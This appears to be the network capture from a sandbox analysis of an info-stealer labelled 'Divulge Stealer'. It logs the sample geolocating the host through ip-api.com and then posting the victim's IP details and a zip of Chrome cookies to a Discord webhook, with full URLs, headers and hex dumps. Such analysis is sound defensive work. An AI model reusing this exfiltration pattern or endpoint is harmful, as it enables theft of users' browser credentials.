                                                                                                                            Dec 11, 2024 08:40:18.088181973 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088200092 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088208914 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088248968 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088258028 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088295937 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088304043 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088361979 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088368893 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088457108 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088469028 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088494062 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088501930 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088557005 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088571072 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088577986 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088582039 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088598967 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088608027 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088694096 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088712931 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088752985 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088767052 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088830948 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088845968 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088862896 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088875055 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088929892 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088937044 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088958025 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088968992 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.088987112 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.088990927 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.089004993 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089015007 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.089073896 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089082003 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089111090 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089142084 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089193106 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089200974 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089230061 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089298964 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089354992 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089402914 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089417934 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.089447021 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131331921 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.131583929 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131841898 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131865025 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131887913 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131899118 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131925106 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.131983042 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.132038116 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.132102013 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.132158041 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.150650024 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.150831938 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.151014090 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.151034117 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.195322037 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:18.195461988 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:18.239336014 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:19.509211063 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:19.509287119 CET44349793162.159.138.232192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:19.509357929 CET49793443192.168.2.6162.159.138.232
                                                                                                                            Dec 11, 2024 08:40:19.509946108 CET49793443192.168.2.6162.159.138.232
                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                            Dec 11, 2024 08:39:45.486399889 CET5279953192.168.2.61.1.1.1
                                                                                                                            Dec 11, 2024 08:39:45.623785973 CET53527991.1.1.1192.168.2.6
                                                                                                                            Dec 11, 2024 08:40:14.413206100 CET5983653192.168.2.61.1.1.1
                                                                                                                            Dec 11, 2024 08:40:14.549686909 CET53598361.1.1.1192.168.2.6
                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                            Dec 11, 2024 08:39:45.486399889 CET192.168.2.61.1.1.10xd60eStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                            Dec 11, 2024 08:40:14.413206100 CET192.168.2.61.1.1.10x6652Standard query (0)discord.comA (IP address)IN (0x0001)false
                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                            Dec 11, 2024 08:39:45.623785973 CET1.1.1.1192.168.2.60xd60eNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                            Dec 11, 2024 08:40:14.549686909 CET1.1.1.1192.168.2.60x6652No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                                                                                            Dec 11, 2024 08:40:14.549686909 CET1.1.1.1192.168.2.60x6652No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                                                                            Dec 11, 2024 08:40:14.549686909 CET1.1.1.1192.168.2.60x6652No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                                                                            Dec 11, 2024 08:40:14.549686909 CET1.1.1.1192.168.2.60x6652No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                                                                            Dec 11, 2024 08:40:14.549686909 CET1.1.1.1192.168.2.60x6652No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                                                                            • discord.com
                                                                                                                            • ip-api.com
                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.649720208.95.112.1806924C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Dec 11, 2024 08:39:45.745012045 CET79OUTGET /json/?fields=225545 HTTP/1.1
                                                                                                                            Host: ip-api.com
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Dec 11, 2024 08:39:46.851389885 CET381INHTTP/1.1 200 OK
                                                                                                                            Date: Wed, 11 Dec 2024 07:39:45 GMT
                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                            Content-Length: 204
                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                            X-Ttl: 42
                                                                                                                            X-Rl: 43
                                                                                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 37 35 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 7d
                                                                                                                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-175.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.175"}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            0192.168.2.649787162.159.138.2324436924C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-11 07:40:15 UTC360OUTPOST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1
                                                                                                                            Accept: application/json
                                                                                                                            User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                            Content-Type: application/json; charset=utf-8
                                                                                                                            Host: discord.com
                                                                                                                            Content-Length: 886
                                                                                                                            Expect: 100-continue
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-12-11 07:40:16 UTC886OUTData Raw: 7b 22 63 6f 6e 74 65 6e 74 22 3a 22 22 2c 22 65 6d 62 65 64 73 22 3a 5b 7b 22 74 69 74 6c 65 22 3a 22 44 69 76 75 6c 67 65 20 53 74 65 61 6c 65 72 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 2a 2a 5f 5f f0 9f 93 a1 4e 65 74 77 6f 72 6b 20 61 64 64 72 65 73 73 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 5f 5f 2a 2a 5c 6e 60 60 60 70 72 6f 6c 6f 67 5c 6e 49 50 3a 20 38 2e 34 36 2e 31 32 33 2e 31 37 35 5c 6e 5c 6e 43 6f 75 6e 74 72 79 3a 20 55 6e 69 74 65 64 20 53 74 61 74 65 73 5c 6e 52 65 67 69 6f 6e 3a 20 4e 65 77 20 59 6f 72 6b 5c 6e 54 69 6d 65 7a 6f 6e 65 3a 20 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 5c 6e 5c 6e 43 65 6c 6c 75 6c 61 72 20 44 61 74 61 3a 20 e2 9d 8e 5c 6e 50 72 6f 78 79 2f 56 50 4e 3a 20 20 20 20 20 e2 9d 8e 5c 6e 5c 6e 60 60 60
                                                                                                                            Data Ascii: {"content":"","embeds":[{"title":"Divulge Stealer","description":"**__Network address information__**\n```prolog\nIP: 8.46.123.175\n\nCountry: United States\nRegion: New York\nTimezone: America/New_York\n\nCellular Data: \nProxy/VPN: \n\n```
                                                                                                                            2024-12-11 07:40:16 UTC25INHTTP/1.1 100 Continue
                                                                                                                            2024-12-11 07:40:16 UTC1298INHTTP/1.1 404 Not Found
                                                                                                                            Date: Wed, 11 Dec 2024 07:40:16 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 45
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                            x-ratelimit-limit: 5
                                                                                                                            x-ratelimit-remaining: 4
                                                                                                                            x-ratelimit-reset: 1733902817
                                                                                                                            x-ratelimit-reset-after: 1
                                                                                                                            via: 1.1 google
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bamIwy83ZFT7y2v3CKu9aewld%2Bvk5ZsQZMYbwR82q9hjVS489nN5myUfGMi6m8s7NR0k3L2GBtHyahxHFoQMCpCskvCplEM5q4aEfLPag2PuRkRIG9qGb%2F2lMrBf"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                            Set-Cookie: __cfruid=6c81c4fbb7ebff5ead0ba6483805c69b9b6a88d7-1733902816; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                            Set-Cookie: _cfuvid=S3vmSPcTE6BGxcUZYj7Q0aQm8HDzs9bcDml18siBgC0-1733902816347-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8f03d3583d1b15a3-EWR
                                                                                                                            {"message": "Unknown Webhook", "code": 10015}


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            1192.168.2.649793162.159.138.2324436924C:\Users\user\Desktop\apDMcnqqWs.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-12-11 07:40:17 UTC531OUTPOST /api/webhooks/1312882330339119204/DThrH97xNlw4juI_9g0e0fzDhrtHNdex_r-KkDBSRTms8TsaDB_AZHbN51MWJHNb9obG HTTP/1.1
                                                                                                                            Accept: application/json
                                                                                                                            User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                            Content-Type: multipart/form-data; boundary="bd313de6-b89a-44ba-9907-aa24c8ebcbff"
                                                                                                                            Host: discord.com
                                                                                                                            Cookie: __cfruid=6c81c4fbb7ebff5ead0ba6483805c69b9b6a88d7-1733902816; _cfuvid=S3vmSPcTE6BGxcUZYj7Q0aQm8HDzs9bcDml18siBgC0-1733902816347-0.0.1.1-604800000
                                                                                                                            Content-Length: 693111
                                                                                                                            Expect: 100-continue
                                                                                                                            2024-12-11 07:40:18 UTC40OUTData Raw: 2d 2d 62 64 33 31 33 64 65 36 2d 62 38 39 61 2d 34 34 62 61 2d 39 39 30 37 2d 61 61 32 34 63 38 65 62 63 62 66 66 0d 0a
                                                                                                                            Data Ascii: --bd313de6-b89a-44ba-9907-aa24c8ebcbff
                                                                                                                            2024-12-11 07:40:18 UTC142OUTData Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 44 69 76 75 6c 67 65 2d 34 30 35 34 36 34 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 44 69 76 75 6c 67 65 2d 34 30 35 34 36 34 2e 7a 69 70 0d 0a 0d 0a
                                                                                                                            Data Ascii: Content-Type: application/zipContent-Disposition: form-data; name=file; filename=Divulge-405464.zip; filename*=utf-8''Divulge-405464.zip
                                                                                                                            2024-12-11 07:40:18 UTC16355OUTData Raw: 50 4b 03 04 14 00 00 08 08 00 f6 14 8b 59 82 d6 51 b9 ef 00 00 00 21 01 00 00 23 00 00 00 42 72 6f 77 73 65 72 73 2f 43 6f 6f 6b 69 65 73 2f 43 68 72 6f 6d 65 20 43 6f 6f 6b 69 65 73 2e 74 78 74 7d cf cd 72 43 40 00 00 e0 f3 66 26 8f 42 77 d9 5d 1c 7a 20 11 3f 15 31 cb 96 b8 18 44 08 51 21 53 e9 be 7d fb 04 fd de e0 93 db 69 6a ef 8d 5c 4f 23 48 18 b7 c1 1b 38 98 41 6c 03 a4 aa 84 6a 1a a2 50 51 0d 85 62 1d 84 de 1e 10 84 de b9 d5 84 bb 21 57 03 5d 64 f5 8f 3e 77 d8 3f f0 6c 78 0d e1 ce f0 96 cb 8d 5d aa 3e 4e fa 39 be 1d 3a 3d 5d 58 5d 7d 2c c5 72 f2 ab d6 3d d3 c4 c4 2c 91 e8 e3 09 ab ae 19 af af 5d 64 3d 83 63 1b 25 9a d4 26 75 3a bb 6b be e6 55 79 3d 3d 86 99 09 78 09 c4 d9 31 cc 3e 52 d6 8a 5b d3 58 2e 5f b5 f1 a8 f3 cf 7b e7 0e bc e1 65 7a fc 5e f6
                                                                                                                            Data Ascii: PKYQ!#Browsers/Cookies/Chrome Cookies.txt}rC@f&Bw]z ?1DQ!S}ij\O#H8AljPQb!W]d>w?lx]>N9:=]X]},r=,]d=c%&u:kUy==x1>R[X._{ez^
                                                                                                                            2024-12-11 07:40:18 UTC16355OUTData Raw: 52 3a 0b f3 a0 a9 8e 9c 2f d9 d3 82 bb 96 90 24 2e 9a 82 0c 77 7a 38 27 b6 f8 ec 9c 0d 5b b3 72 b6 c1 9d 7b a4 d5 7a 23 69 d0 a3 a0 c9 70 b7 8c 2d cb cb 07 57 73 15 2d 0a 61 ce 49 2d ca cd 8a 45 75 cf 38 88 e9 cf 73 f9 86 95 27 9b d4 a6 05 b3 c9 31 74 94 3a f6 77 a5 c0 c7 e5 88 9e 82 1f d8 4d 2f 1e fc f4 d5 d5 74 40 79 45 47 63 d5 b1 f6 01 c9 67 93 5b 0a ea b0 fa e0 bc b1 40 8e db b3 27 31 bb 23 99 13 13 d1 66 2c 9b 09 46 dd 3f bb 73 cf 2d 54 2a 5b f7 6b b7 91 50 67 dc 40 0a ba 87 dc 51 0f 68 44 71 bb ef 78 39 63 bd e1 9b 86 8f e9 fa c6 57 cf 48 49 c3 0f 91 da 02 8c 34 13 c0 7f ad 2a 9d b1 fa d5 bf 0d 5d 4a 55 07 7f 85 16 10 2a 87 9b df 58 7e cc 08 3e 45 71 55 da fd 25 af c7 36 f6 c3 9b a3 87 9a e4 73 1e 44 cd 7e dc fd 52 90 20 47 ce 3d 43 fc 96 92 ae de
                                                                                                                            Data Ascii: R:/$.wz8'[r{z#ip-Ws-aI-Eu8s'1t:wM/t@yEGcg[@'1#f,F?s-T*[kPg@QhDqx9cWHI4*]JU*X~>EqU%6sD~R G=C
                                                                                                                            2024-12-11 07:40:18 UTC16355OUTData Raw: e9 35 2b ca 01 67 e8 1c 74 47 e4 1d c3 28 b0 ed 82 e5 8c 87 d1 72 31 19 a5 90 b4 cc b4 cf 22 c6 cc 8e 7b c6 29 45 4e 79 64 c7 1d 21 b4 21 71 a0 1d 15 56 0f a3 7f 91 66 69 02 5a f4 58 0b 22 95 99 6f 64 f3 db 0b 33 27 0a 69 ae 62 06 7a 18 c3 ae 4e 0b db 87 a1 5d 63 dc b1 80 6e b3 79 18 1c 03 f7 6c 49 ce 53 9d fd 86 a5 f4 c8 b0 59 cc 51 3f 0b 82 0d ea 8b ed 37 cf d9 cd 30 62 9f df 3a 40 b9 fa 97 26 e0 d2 00 ee e5 ac e7 6f b2 a3 63 e2 86 34 5a 99 33 d3 2c d4 a2 26 c5 5e 6b 5f f7 ee 96 d8 77 7c 5d e6 b9 1d 96 0f be 50 f8 c7 16 dd 89 69 36 67 76 d8 3f 25 39 0a 3b c9 53 66 9f a2 3d f6 cb 72 a8 e2 2e 6c c8 e9 e2 80 fc ca d7 f8 ca 1b 19 99 1a ed 98 6e 90 51 54 85 2b b7 69 da 80 de d1 03 d1 88 dd 0c e2 9a fd 5e ef d0 ec cd 19 ed 9f a2 dd 8c 8d c4 e6 50 15 19 80 fa
                                                                                                                            Data Ascii: 5+gtG(r1"{)ENyd!!qVfiZX"od3'ibzN]cnylISYQ?70b:@&oc4Z3,&^k_w|]Pi6gv?%9;Sf=r.lnQT+i^P
                                                                                                                            2024-12-11 07:40:18 UTC16355OUTData Raw: 59 fa 49 0f 72 e6 c4 0d e6 24 a9 60 e6 60 9d af 0c 64 8b 91 43 a7 69 80 b3 59 30 02 a8 80 61 4c 1e 06 41 c4 34 4b 98 12 64 08 6d 7d d3 bb 13 90 9d b3 bc 79 18 56 72 64 43 ee 0a 5a b6 de 50 75 c3 48 39 5f 68 e7 db 55 53 97 62 0b 69 09 17 96 ec a9 ed d8 ad 5c 4e de 37 6d d6 f7 4c 42 4c 9a d0 42 c5 09 2c 1e 53 fc 28 90 3f e8 65 72 a0 e5 01 13 10 6d 09 42 a7 89 70 68 89 ae 4a f3 b4 df cd be 31 32 a0 26 80 9b c7 a4 c2 63 a4 88 e7 5a 71 c7 de 5a 50 ef 4a b7 8b f0 ea 75 1a 4e 48 ee ae 25 c1 7a 38 3a b4 f1 9d fa 0b 5e bb 23 0b fd 23 22 ca 0b 2d 12 ec 90 68 3d 67 2d 39 d3 8b 8c 57 3d 73 6e b9 95 cf 9e e3 8a 1c 8b ff 33 0c a2 26 d2 31 3b 46 c7 b6 03 9a 08 30 cf 4e a0 3d 66 e8 e9 07 12 ab cb fc 5d a4 be 80 03 10 2a c0 58 3c 84 fb 82 4c 47 64 96 de 86 8a e7 47 31 af
                                                                                                                            Data Ascii: YIr$``dCiY0aLA4Kdm}yVrdCZPuH9_hUSbi\N7mLBLB,S(?ermBphJ12&cZqZPJuNH%z8:^##"-h=g-9W=sn3&1;F0N=f]*X<LGdG1
                                                                                                                            2024-12-11 07:40:18 UTC16355OUTData Raw: c1 c1 a0 76 cd a9 23 2e ad cc 5c 17 76 21 5e 42 63 05 29 ad 1d 40 42 f5 08 97 eb 6f 8d 34 4b aa 5f d3 26 77 ee 09 a7 9f 6e 06 90 ab c2 6d 2e 92 ce 7a 3e 7c c8 8b 36 38 96 16 68 77 1a ca 7a 22 dc 86 0b 1c 5c 02 19 f6 f5 30 8f 09 bc d2 8d 5e 9b 98 fa 65 c6 86 93 df 9c 3c 9c 6a f7 1b 3f 83 d6 75 eb 9d 29 01 aa d6 d8 70 94 0b d9 28 2e 5f 50 db a9 23 4e 96 0a e6 29 c2 4d 29 14 6d 05 0c c9 cc ea 8c f2 b6 b7 9e 1a 48 05 d2 2d 91 7e 0f 41 b7 19 6d 37 e2 c2 73 59 e6 a4 ae 82 34 55 57 3d e2 ca c6 dd 1c 81 8d e8 3b 77 58 d9 6e 5f c6 fe 3b ae cc a6 3f 71 1f 54 f8 fc bf 56 fd 2c 47 00 cc cb 55 2f 58 c9 c8 8d ef e5 46 e1 bb 2d 81 ab ed ad 58 dd 24 67 25 40 b4 75 db 11 50 a4 11 fb a4 cc b4 de ee eb 1b 08 fa 79 ae 29 6d ac a4 ed a8 d5 f6 5d 26 aa 66 d8 d6 91 9a d4 61 dc
                                                                                                                            Data Ascii: v#.\v!^Bc)@Bo4K_&wnm.z>|68hwz"\0^e<j?u)p(._P#N)M)mH-~Am7sY4UW=;wXn_;?qTV,GU/XF-X$g%@uPy)m]&fa
                                                                                                                            2024-12-11 07:40:18 UTC16355OUTData Raw: ba 39 49 01 0b e5 64 01 e6 03 be 88 6c a5 e7 22 7c 11 58 f0 e6 ac a5 9f 35 9b 03 da 1a 4a 27 85 29 31 b0 42 6d 91 7b 3c 24 ee 95 69 39 8a 50 54 fb 86 d7 29 85 8e c7 f7 0c ad ca 10 14 d7 ea c4 7b ee f2 61 5b a8 45 07 12 0c 40 37 59 9a 7d bb 70 f9 8f dc 70 82 1c 20 1b 2e 02 ee 65 32 c7 74 70 5f 35 7a 4b 57 01 ba ec 2e 8f ce e6 cd fe 90 04 49 a7 d3 c2 6d 5f 6d 78 b1 10 18 90 f6 92 80 ce 2a 33 56 84 71 4b b7 c9 33 29 40 c5 65 e6 e7 59 ec e3 c6 cc d8 b0 84 e0 40 9e 5a ba 92 42 d0 cd fa 20 0c 31 8f 07 33 a6 89 4d 8c c1 08 c7 6a 5e 0a 80 d6 a2 86 15 25 e5 38 74 e9 35 86 fb e0 62 7b d0 89 53 72 f0 6c e2 ac 2d d8 8c 35 aa 94 1b 92 25 4d 9e bb 44 e8 85 1f f6 77 ed 41 3b 77 9f ae 99 81 3e b0 c4 91 3d ed ce bc 52 7d c9 65 36 09 43 94 12 5b 4e 3c ed 80 ea 5b 25 31 8d
                                                                                                                            Data Ascii: 9Idl"|X5J')1Bm{<$i9PT){a[E@7Y}pp .e2tp_5zKW.Im_mx*3VqK3)@eY@ZB 13Mj^%8t5b{Srl-5%MDwA;w>=R}e6C[N<[%1
                                                                                                                            2024-12-11 07:40:18 UTC16355OUTData Raw: 9f f7 e8 e4 b6 63 ec 3c 4d 9a fa 40 46 bf 22 f8 d5 6f db cd b8 15 a4 74 19 10 a0 2c 7f 37 c7 e0 37 78 43 d3 93 1e e0 b8 bd 79 48 f8 ed 4a 24 19 c6 d2 bc a0 65 a9 3c d5 50 c5 f2 5a 25 21 7a c9 94 f5 83 86 b5 99 fe 28 4a 26 4a 27 e5 32 28 fb ea 81 c2 01 fe 81 27 f9 60 5e ee 1e b9 e9 97 d4 8c d6 d4 98 11 0f 63 41 f3 ad 23 36 57 22 9a 71 3e 6c 18 d1 52 2e 81 45 5c 01 42 0f ef 7d 52 02 48 6a c6 1a 74 c9 a1 f1 cd 21 dd 57 4d c2 93 bc ce fb e3 fe 83 11 21 fd 74 1c d0 8b ab 73 7d bd 4b c5 ac 6a be 31 73 6a 0b 1b 4f a3 b7 5c d9 7f 30 df 7c f0 d0 ca 5b 38 69 46 ad 6e 32 fc 1e b7 97 af 03 30 99 71 65 5a 82 1c c2 86 64 97 01 e1 83 4b 5a 5c f9 b1 c7 5e ca 69 f7 d2 38 8d c1 6e b9 69 17 39 76 9d 84 4e 9a 41 77 bf 9e 90 df e4 a5 52 36 2e c3 6c 81 3e 9e 97 c3 7c 78 73 43
                                                                                                                            Data Ascii: c<M@F"ot,77xCyHJ$e<PZ%!z(J&J'2('`^cA#6W"q>lR.E\B}RHjt!WM!ts}Kj1sjO\0|[8iFn20qeZdKZ\^i8ni9vNAwR6.l>|xsC
                                                                                                                            2024-12-11 07:40:18 UTC16355OUTData Raw: 01 b1 fe 90 c7 c6 40 8b cc fd 00 b6 8e 2d d8 21 36 47 d0 b8 7a 4f a0 1d 0b bd 81 d7 47 ec 71 06 8f 6e e9 6b a8 ee 35 3c f7 84 6a b3 f8 ea a4 c0 ed ea 11 b6 cf 01 ca 6b 0f 81 5c e0 57 29 eb b9 1b 70 7e 0f 05 5a 30 20 a7 11 31 18 f1 dc d1 68 f3 94 c9 5f ed d8 8b 27 d5 6c 38 9f 7e ea 56 6b f6 a7 c1 02 9f 8a 92 8e a7 81 cd 5b 49 35 c0 45 9b 60 cd 34 74 27 66 dd f3 bb df c6 60 5b 3d 38 12 5b c0 42 6e 45 2c c9 7f 54 04 05 6b 4c 65 6f 37 b5 f5 ae d4 15 00 ca 1c 88 7b b0 50 9c 4f 2c d8 b4 2f c5 d2 dc a5 fb e7 79 c6 0f c3 4d e3 f5 5e db da b9 5b b2 a0 b6 8d 09 4b 08 b8 95 50 39 6b 2b 1a a4 9f d8 3d 7d 43 1a c1 ea 4b f8 b7 60 43 e0 21 28 31 e8 b8 2c 67 b0 18 82 37 7f 6a ab 35 50 07 66 2e 13 1f 85 a5 d5 f2 08 88 c9 52 9c 8f d9 10 1c 17 13 fe 55 16 7c 77 f4 98 91 29
                                                                                                                            Data Ascii: @-!6GzOGqnk5<jk\W)p~Z0 1h_'l8~Vk[I5E`4t'f`[=8[BnE,TkLeo7{PO,/yM^[KP9k+=}CK`C!(1,g7j5Pf.RU|w)
                                                                                                                            2024-12-11 07:40:18 UTC25INHTTP/1.1 100 Continue
                                                                                                                            2024-12-11 07:40:19 UTC1007INHTTP/1.1 404 Not Found
                                                                                                                            Date: Wed, 11 Dec 2024 07:40:19 GMT
                                                                                                                            Content-Type: application/json
                                                                                                                            Content-Length: 45
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=3600, s-maxage=3600
